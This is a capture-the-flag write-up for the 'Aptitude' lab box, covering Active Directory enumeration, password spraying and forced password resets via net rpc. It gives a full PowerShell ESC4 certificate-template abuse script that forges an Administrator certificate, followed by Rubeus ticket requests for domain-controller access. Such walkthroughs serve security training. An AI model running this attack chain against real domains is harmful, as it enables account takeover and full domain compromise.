--- title: 'THM Industrial CTF Aptitude box writeup ' --- THM Industrial CTF Aptitude writeup === ## Table of Contents [TOC] # Foothold ## Description As we make our way deep into the Virelia Water Control Facility, we encounter a target that can alter the course of battle. ZeroTrace is the only one that can see the forest through the trees and successfully breach the target's domain. However, the target knows ZeroTrace is ready for attack and will not go down without a fight. > We can deduce the some user[s] has the ability to change attributes of other users. Recon --- ```java └─$ nmap -Pn -sCV 10.10.93.74 Nmap scan report for 10.10.93.74 Host is up (0.081s latency). Not shown: 991 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: aptitude.thm0., Site: Default-First-Site-Name) | ssl-cert: Subject: commonName=DC01.aptitude.thm | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.aptitude.thm | Not valid before: 2025-05-15T05:15:57 |_Not valid after: 2026-05-15T05:15:57 |_ssl-date: 2025-06-29T16:07:35+00:00; -2s from scanner time. 3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: aptitude.thm0., Site: Default-First-Site-Name) | ssl-cert: Subject: commonName=DC01.aptitude.thm | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.aptitude.thm | Not valid before: 2025-05-15T05:15:57 |_Not valid after: 2026-05-15T05:15:57 |_ssl-date: 2025-06-29T16:07:35+00:00; -2s from scanner time. 3389/tcp open ms-wbt-server Microsoft Terminal Services | ssl-cert: Subject: commonName=DC01.aptitude.thm | Not valid before: 2025-05-13T20:40:11 |_Not valid after: 2025-11-12T20:40:11 |_ssl-date: 2025-06-29T16:07:35+00:00; -2s from scanner time. | rdp-ntlm-info: | Target_Name: APTITUDE | NetBIOS_Domain_Name: APTITUDE | NetBIOS_Computer_Name: DC01 | DNS_Domain_Name: aptitude.thm | DNS_Computer_Name: DC01.aptitude.thm | DNS_Tree_Name: aptitude.thm | Product_Version: 10.0.17763 |_ System_Time: 2025-06-29T16:06:55+00:00 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: | smb2-time: | date: 2025-06-29T16:06:56 |_ start_date: N/A | smb2-security-mode: | 3:1:1: |_ Message signing enabled and required |_clock-skew: mean: -1s, deviation: 0s, median: -2s ``` > Normal Acitve Directory ports with rdp,winrm there. > Notice the port 88 (Kerberos) is present with the default ldap port 389 > SMB signing enabled and required ``` Domain : aptitude.thm DC : DC01.aptitude.thm ``` ```javascript └─$ nxc smb 10.10.93.74 -u guest -p '' --shares SMB 10.10.93.74 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:aptitude.thm) (signing:True) (SMBv1:False) SMB 10.10.93.74 445 DC01 [+] aptitude.thm\guest: SMB 10.10.93.74 445 DC01 [*] Enumerated shares SMB 10.10.93.74 445 DC01 Share Permissions Remark SMB 10.10.93.74 445 DC01 ----- ----------- ------ SMB 10.10.93.74 445 DC01 ADMIN$ Remote Admin SMB 10.10.93.74 445 DC01 C$ Default share SMB 10.10.93.74 445 DC01 IPC$ READ Remote IPC SMB 10.10.93.74 445 DC01 it READ For IT Employees SMB 10.10.93.74 445 DC01 NETLOGON Logon server share SMB 10.10.93.74 445 DC01 SYSVOL Logon server share ``` > Read access on non-standard share (it), inside it we find welcome.pdf  > It's obvious to use Reberto with the password found to get the other users and spray the password. > We find another users with same password: arlina - We will now use the user we have to further enumerate the domain itself using `ldapdomaindump` ```java ─$ ldapdomaindump -u 'aptitude.thm\arlina' -p 'Default_2025!' 10.10.93.74:3268 [*] Connecting to host... [*] Binding to host [+] Bind OK [*] Starting domain dump [+] Domain dump finished ``` + Open the domain_users.html file  | arlina can rdp + We will login via *xfreerdp* and enumerate more via SahrpHound. + First transfer you SharpHound.exe script to target machine + After you get the output, transfer it back to you ``` .\SharpHound.exe -c All -d aptitude.thm ```  `arlina => phedra => marry-ann => itadmin ` ```java net rpc password "PHEDRA" "newP@ssword2022" -U "aptitude.thm"/"arlina"%'Default_2025!' -S "dc01.aptitude.thm" net rpc password "MARY-ANN" "newP@ssword2022" -U "aptitude.thm"/"PHEDRA"%'newP@ssword2022' -S "dc01.aptitude.thm" net rpc password "ITADMIN" "newP@ssword2022" -U "aptitude.thm"/"MARY-ANN"%'newP@ssword2022' -S "dc01.aptitude.thm" ``` + We can now login as itadmin and get user.txt  <br> # Privilege Escalation + Doing services enumeration, manual enumeration and hunting for credentials yields nothing so we check the Certificate Services > Note that using certipy will yield timeouts because some of the ports are blocked ```powershell PS C:\Users\itadmin> certutil -template ``` + Reading the output carefully we notice that *itadmin* has full control over template *ITUser* which is a classic [ESC4](https://www.hackingarticles.in/adcs-esc4-vulnerable-certificate-template-access-control/) vulnerability + We did it manually from inside fool  + Referring to this article [ADCSESC4](https://bloodhound.specterops.io/resources/edges/adcs-esc4#step-1%3A-ensure-the-certificate-template-allows-for-client-authentication) + The script below will take care of creating a pfx for the admin for use ```powershell! $templateName = "ITUser" $principalName = "itadmin" $rootDSE = New-Object DirectoryServices.DirectoryEntry("LDAP://RootDSE") $template = [ADSI]"LDAP://CN=$templateName,CN=Certificate Templates,CN=Public Key Services,CN=Services,$($rootDSE.configurationNamingContext)" $clientAuthEKU = "1.3.6.1.5.5.7.3.2" $currentEKUs = $template.Get("pKIExtendedKeyUsage") if ($currentEKUs -notcontains $clientAuthEKU) { $newEKUs = $currentEKUs + @($clientAuthEKU) $template.Put("pKIExtendedKeyUsage", $newEKUs) } $currentFlags = $template.Get("msPKI-Certificate-Name-Flag") $newFlags = $currentFlags -bor 0x00000001 $template.Put("msPKI-Certificate-Name-Flag", $newFlags) $currentEnrollFlags = $template.Get("msPKI-Enrollment-Flag") $newEnrollFlags = $currentEnrollFlags -band (-bnot 0x00000002) $template.Put("msPKI-Enrollment-Flag", $newEnrollFlags) $template.Put("msPKI-RA-Signature", 0) $template.SetInfo() @" [NewRequest] Subject = "CN=Administrator" KeySpec = 1 KeyLength = 2048 Exportable = TRUE MachineKeySet = FALSE SMIME = FALSE PrivateKeyArchive = FALSE UserProtected = FALSE UseExistingKeySet = FALSE ProviderName = "Microsoft RSA SChannel Cryptographic Provider" ProviderType = 12 RequestType = PKCS10 KeyUsage = 0xa0 [Extensions] 2.5.29.17 = "{text}" _continue_ = "upn=Administrator@aptitude.thm&" [RequestAttributes] CertificateTemplate = ITUser SAN = upn:Administrator@aptitude.thm "@ | Out-File -FilePath "esc4_admin.inf" -Encoding ASCII certreq -new esc4_admin.inf esc4_admin.req certreq -submit esc4_admin.req esc4_admin.cer certreq -accept esc4_admin.cer $adminCert = Get-ChildItem -Path "Cert:\CurrentUser\My" | Where-Object { $_.Subject -eq "CN=Administrator" } | Sort-Object NotBefore -Descending | Select-Object -First 1 if ($adminCert) { $password = ConvertTo-SecureString -String "ESC4Attack!" -Force -AsPlainText Export-PfxCertificate -Cert $adminCert -FilePath "admin_esc4.pfx" -Password $password } $adminUser = [ADSI]"LDAP://CN=Administrator,CN=Users,DC=aptitude,DC=thm" $certMapping = "<I>CN=aptitude-DC01-CA-2,DC=aptitude,DC=thm<S>CN=Administrator" $adminUser.Put("altSecurityIdentities", @($certMapping)) $adminUser.SetInfo() ``` + Then grab the thumprint ```powershell! Get-ChildItem -Path "Cert:\CurrentUser\My" | Select-Object Subject, Thumbprint, HasPrivateKey ``` + Request TGT with Rubeus ```powershell .\rub.exe asktgt /user:Administrator /certificate:<Thumprint> /domain:aptitude.thm /dc:<dc-ip> /ptt ```   + Final step is to use the ticket > note that psexec didn't work ```powershell winrs -r:DC01.aptitude.thm cmd ```  # Credits + Team: Toasters + d3vnu11 [HackTheBox](https://app.hackthebox.com/users/1414638) + ʎɐsǝǝu [HackTheBox](https://app.hackthebox.com/profile/1725001)